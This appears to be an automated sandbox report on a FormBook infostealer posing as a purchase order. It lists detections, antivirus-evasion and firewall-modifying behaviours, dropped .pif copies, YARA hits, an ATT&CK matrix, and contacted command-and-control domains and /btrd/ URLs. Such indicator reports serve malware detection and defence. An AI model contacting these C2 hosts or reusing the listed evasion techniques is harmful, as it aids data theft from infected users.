Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation

Source: C:\Users\user\Desktop\PURCHASED ORDER OF ENG091.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Uses netsh to modify the Windows network and firewall settings

Source: C:\Windows\explorer.exe

Process created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\SysWOW64\netsh.exe"

Source: PURCHASED ORDER OF ENG091.exe, 00000000.00000002.2179042011.00000000050F4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\C:\Program Files (x86)\AVG\Antivirus\AVGUI.exe
Source: PURCHASED ORDER OF ENG091.exe, 00000000.00000002.2179042011.000000000513C000.00000004.00000020.00020000.00000000.sdmp, PURCHASED ORDER OF ENG091.exe, 00000000.00000002.2173739355.0000000000AD5000.00000004.00000020.00020000.00000000.sdmp, PURCHASED ORDER OF ENG091.exe, 00000000.00000002.2178914699.00000000050A9000.00000004.00000020.00020000.00000000.sdmp, PURCHASED ORDER OF ENG091.pif, 0000000C.00000002.2348427426.00000000059EC000.00000004.00000020.00020000.00000000.sdmp, PURCHASED ORDER OF ENG091.pif, 00000015.00000002.2421067094.00000000056FA000.00000004.00000020.00020000.00000000.sdmp, PURCHASED ORDER OF ENG091.pif, 00000015.00000002.2401595350.0000000000808000.00000004.00000020.00020000.00000000.sdmp, PURCHASED ORDER OF ENG091.pif.pif, 0000001D.00000002.2491782208.00000000005A5000.00000004.00000020.00020000.00000000.sdmp, PURCHASED ORDER OF ENG091.pif.pif, 0000001D.00000002.2505667538.0000000005448000.00000004.00000020.00020000.00000000.sdmp, PURCHASED ORDER OF ENG091.pif.pif, 00000026.00000002.2633457329.0000000006187000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: PURCHASED ORDER OF ENG091.exe, 00000000.00000002.2174149800.0000000002ACE000.00000004.00000800.00020000.00000000.sdmp, PURCHASED ORDER OF ENG091.pif, 0000000C.00000002.2329293185.0000000002A21000.00000004.00000800.00020000.00000000.sdmp, PURCHASED ORDER OF ENG091.pif, 00000015.00000002.2403280656.000000000259A000.00000004.00000800.00020000.00000000.sdmp, PURCHASED ORDER OF ENG091.pif.pif, 0000001D.00000002.2493397578.0000000002648000.00000004.00000800.00020000.00000000.sdmp, PURCHASED ORDER OF ENG091.pif.pif, 00000026.00000002.2612943933.0000000002F95000.00000004.00000800.00020000.00000000.sdmp, PURCHASED ORDER OF ENG091.pif.pif.pif, 0000002E.00000002.2700394567.0000000003054000.00000004.00000800.00020000.00000000.sdmp, PURCHASED ORDER OF ENG091.pif.pif.pif, 00000036.00000002.2785236388.00000000034E0000.00000004.00000800.00020000.00000000.sdmp, PURCHASED ORDER OF ENG091.pif.pif.pif.pif, 0000003F.00000002.2864011147.0000000002B60000.00000004.00000800.00020000.00000000.sdmp, PURCHASED ORDER OF ENG091.pif.pif.pif.pif, 00000047.00000002.2995542174.0000000003551000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: q(C:\Program Files\AVG\Antivirus\AVGUI.exe
Source: PURCHASED ORDER OF ENG091.exe, 00000000.00000002.2174149800.0000000002ACE000.00000004.00000800.00020000.00000000.sdmp, PURCHASED ORDER OF ENG091.pif, 0000000C.00000002.2329293185.0000000002A21000.00000004.00000800.00020000.00000000.sdmp, PURCHASED ORDER OF ENG091.pif, 00000015.00000002.2403280656.000000000259A000.00000004.00000800.00020000.00000000.sdmp, PURCHASED ORDER OF ENG091.pif.pif, 0000001D.00000002.2493397578.0000000002648000.00000004.00000800.00020000.00000000.sdmp, PURCHASED ORDER OF ENG091.pif.pif, 00000026.00000002.2612943933.0000000002F95000.00000004.00000800.00020000.00000000.sdmp, PURCHASED ORDER OF ENG091.pif.pif.pif, 0000002E.00000002.2700394567.0000000003054000.00000004.00000800.00020000.00000000.sdmp, PURCHASED ORDER OF ENG091.pif.pif.pif, 00000036.00000002.2785236388.00000000034E0000.00000004.00000800.00020000.00000000.sdmp, PURCHASED ORDER OF ENG091.pif.pif.pif.pif, 0000003F.00000002.2864011147.0000000002B60000.00000004.00000800.00020000.00000000.sdmp, PURCHASED ORDER OF ENG091.pif.pif.pif.pif, 00000047.00000002.2995542174.0000000003551000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: q.C:\Program Files (x86)\AVG\Antivirus\AVGUI.exe

Source: C:\Users\user\Desktop\PURCHASED ORDER OF ENG091.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 7.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PURCHASED ORDER OF ENG091.exe.389a1f0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000002D.00000002.2649126395.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.3387644205.000000000EB42000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.2627604465.0000000003F49000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002E.00000002.2712579590.0000000004028000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2176143982.000000000389A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000035.00000002.2731575552.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2235289603.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2176143982.0000000003A5B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.2500819565.00000000035F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2367170516.0000000002ED0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.3365508291.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2343571638.00000000039AB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2176143982.00000000039CC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.2411207031.000000000352B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.3366459232.0000000004520000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000036.00000002.2805551760.0000000004534000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000046.00000002.2895699701.0000000005070000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.2436330065.00000000006E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000004E.00000002.3035230297.0000000003190000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000003E.00000002.2823024000.0000000000960000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000003F.00000002.2884163790.0000000003BB4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000047.00000002.3030559754.00000000045B3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.2526649554.0000000000B30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.3366396664.00000000044F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Source: C:\Windows\explorer.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\explorer.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\explorer.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\explorer.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\explorer.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\explorer.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\explorer.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\explorer.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\explorer.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\explorer.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\explorer.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\explorer.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\explorer.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\explorer.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\explorer.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\explorer.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\explorer.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\explorer.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\explorer.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\explorer.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\explorer.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\explorer.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\explorer.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\explorer.exe	Directory queried: C:\Users\user\Documents	Jump to behavior

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 7.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PURCHASED ORDER OF ENG091.exe.389a1f0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000002D.00000002.2649126395.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.3387644205.000000000EB42000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.2627604465.0000000003F49000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002E.00000002.2712579590.0000000004028000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2176143982.000000000389A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000035.00000002.2731575552.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2235289603.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2176143982.0000000003A5B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.2500819565.00000000035F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2367170516.0000000002ED0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.3365508291.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2343571638.00000000039AB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2176143982.00000000039CC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.2411207031.000000000352B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.3366459232.0000000004520000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000036.00000002.2805551760.0000000004534000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000046.00000002.2895699701.0000000005070000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.2436330065.00000000006E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000004E.00000002.3035230297.0000000003190000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000003E.00000002.2823024000.0000000000960000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000003F.00000002.2884163790.0000000003BB4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000047.00000002.3030559754.00000000045B3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.2526649554.0000000000B30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.3366396664.00000000044F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	11 Disable or Modify Tools	1 Credential API Hooking	11 File and Directory Discovery	Remote Services	1 Archive Collected Data	2 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Shared Modules	11 Registry Run Keys / Startup Folder	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	LSASS Memory	212 System Information Discovery	Remote Desktop Protocol	1 Data from Local System	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Command and Scripting Interpreter	Logon Script (Windows)	712 Process Injection	1 Abuse Elevation Control Mechanism	Security Account Manager	341 Security Software Discovery	SMB/Windows Admin Shares	1 Credential API Hooking	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	11 Registry Run Keys / Startup Folder	2 Obfuscated Files or Information	NTDS	2 Process Discovery	Distributed Component Object Model	Input Capture	12 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	41 Virtualization/Sandbox Evasion	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Rootkit	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	11 Masquerading	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Modify Registry	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	41 Virtualization/Sandbox Evasion	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	712 Process Injection	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	1 Rundll32	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
PURCHASED ORDER OF ENG091.exe	61%	ReversingLabs	Win32.Backdoor.FormBook
PURCHASED ORDER OF ENG091.exe	64%	Virustotal		Browse
PURCHASED ORDER OF ENG091.exe	100%	Avira	HEUR/AGEN.1305452
PURCHASED ORDER OF ENG091.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	100%	Avira	HEUR/AGEN.1305452
C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif.pif	100%	Avira	HEUR/AGEN.1305452
C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif	100%	Avira	HEUR/AGEN.1305452
C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif	100%	Avira	HEUR/AGEN.1305452
C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	100%	Avira	HEUR/AGEN.1305452
C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	100%	Joe Sandbox ML
C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif.pif	100%	Joe Sandbox ML
C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif	100%	Joe Sandbox ML
C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif	100%	Joe Sandbox ML
C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	100%	Joe Sandbox ML
C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	61%	ReversingLabs	Win32.Backdoor.FormBook
C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif	61%	ReversingLabs	Win32.Backdoor.FormBook
C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif	61%	ReversingLabs	Win32.Backdoor.FormBook
C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	61%	ReversingLabs	Win32.Backdoor.FormBook
C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif.pif	61%	ReversingLabs	Win32.Backdoor.FormBook

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Link
www.thecolourgrey.com	0%	Virustotal	Browse
parkingpage.namecheap.com	0%	Virustotal	Browse
texanboxes.com	4%	Virustotal	Browse
youngonven.com	0%	Virustotal	Browse
www.emeraldsurrogatefabric.com	8%	Virustotal	Browse
hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com	0%	Virustotal	Browse
www.0757hunyin.net	0%	Virustotal	Browse
www.pure1027.com	0%	Virustotal	Browse
www.anangtoto.com	1%	Virustotal	Browse
www.texanboxes.com	0%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV	0%	URL Reputation	safe
https://api.msn.com:443/v1/news/Feed/Windows?	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings	0%	URL Reputation	safe
https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew	0%	URL Reputation	safe
https://android.notify.windows.com/iOS	0%	URL Reputation	safe
http://schemas.micro	0%	URL Reputation	safe
https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew	0%	URL Reputation	safe
http://www.thebestanglephotography.online	1%	Virustotal		Browse
http://www.emeraldsurrogatefabric.com	8%	Virustotal		Browse
http://youngonven.com/1485#Re	0%	Virustotal		Browse
http://www.texanboxes.com/btrd/	1%	Virustotal		Browse
http://www.martline.website/btrd/	15%	Virustotal		Browse
http://www.xmentorgroup.com	0%	Virustotal		Browse
http://www.rd8.online/btrd/	2%	Virustotal		Browse
http://www.outletivo.com	1%	Virustotal		Browse
http://www.rd8.online	1%	Virustotal		Browse
http://www.outletivo.com/btrd/	4%	Virustotal		Browse
www.cnoszirzbkaqz.com/btrd/	6%	Virustotal		Browse
http://www.invest247on.com/btrd/	0%	Virustotal		Browse
http://www.emeraldsurrogatefabric.com/btrd/	8%	Virustotal		Browse
http://www.pure1027.com/btrd/	2%	Virustotal		Browse
http://www.watch2movie.xyz/btrd/	3%	Virustotal		Browse
https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp	0%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
www.thecolourgrey.com	104.21.93.17	true	true	0%, Virustotal, Browse	unknown
parkingpage.namecheap.com	91.195.240.19	true	true	0%, Virustotal, Browse	unknown
texanboxes.com	3.33.130.190	true	true	4%, Virustotal, Browse	unknown
youngonven.com	63.250.38.167	true	false	0%, Virustotal, Browse	unknown
www.emeraldsurrogatefabric.com	192.243.59.20	true	true	8%, Virustotal, Browse	unknown
hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com	34.205.242.146	true	true	0%, Virustotal, Browse	unknown
www.pure1027.com	unknown	unknown	true	0%, Virustotal, Browse	unknown
www.0757hunyin.net	unknown	unknown	true	0%, Virustotal, Browse	unknown
www.anangtoto.com	unknown	unknown	true	1%, Virustotal, Browse	unknown
www.texanboxes.com	unknown	unknown	true	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
www.cnoszirzbkaqz.com/btrd/	true	6%, Virustotal, Browse	unknown
http://www.emeraldsurrogatefabric.com/btrd/?8pn=ChvLWF0pZdjL9&orD=G5lr6//zQ7aMiplq1GdUNb9GEJVmzQOhD2w3hHYWxcuiBbLjkdh8uX+W8X62ffIzaE+7zSgsRw==	true		unknown
http://www.anangtoto.com/btrd/?orD=sqRP0a8aV68K6FqJqAk+hHqxgWstkLnSX2TzjpZXqgEq2vKFORbsNIdmsOuhVtdKxSDXL4nXjg==&8pn=ChvLWF0pZdjL9	true		unknown
http://youngonven.com/1485	false		unknown
http://www.thecolourgrey.com/btrd/?8pn=ChvLWF0pZdjL9&orD=1hanRQkKsw2EpQWVKCl4LROlWZtcCFpSARtuzqwGSwLi36Og4ncRpLu12qyBMcT+6ho6oQQ/oA==	true		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV	explorer.exe, 00000008.00000002.3371865192.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/money/savingandinvesting/americans-average-net-worth-by-age/ar-AA1h4ngF	explorer.exe, 00000008.00000000.2178462917.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3371865192.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.thebestanglephotography.online	explorer.exe, 00000008.00000003.2980907839.000000000C4EB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3386744708.000000000C4D8000.00000004.00000001.00020000.00000000.sdmp	false	1%, Virustotal, Browse	unknown
https://api.msn.com:443/v1/news/Feed/Windows?	explorer.exe, 00000008.00000002.3377674269.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2178462917.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2185822168.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3371865192.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://word.office.comM	explorer.exe, 00000008.00000002.3385226475.000000000C087000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2981523077.000000000C048000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2191523498.000000000C048000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.emeraldsurrogatefabric.com	explorer.exe, 00000008.00000003.2980907839.000000000C4EB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3386744708.000000000C4D8000.00000004.00000001.00020000.00000000.sdmp	true	8%, Virustotal, Browse	unknown
http://youngonven.com/1485#Re	PURCHASED ORDER OF ENG091.exe, 00000000.00000000.2119834627.0000000000442000.00000002.00000001.01000000.00000003.sdmp, cmd.exe, 00000005.00000003.2161957449.00000000032E5000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000003.2315915569.0000000002AE6000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000019.00000003.2390659515.0000000003086000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000022.00000003.2479534553.0000000002695000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000002A.00000003.2596807840.0000000003135000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000032.00000003.2684351983.00000000032E4000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000003A.00000003.2769484455.0000000002905000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000043.00000003.2848660519.00000000032C4000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000004B.00000003.2975731288.00000000035E4000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
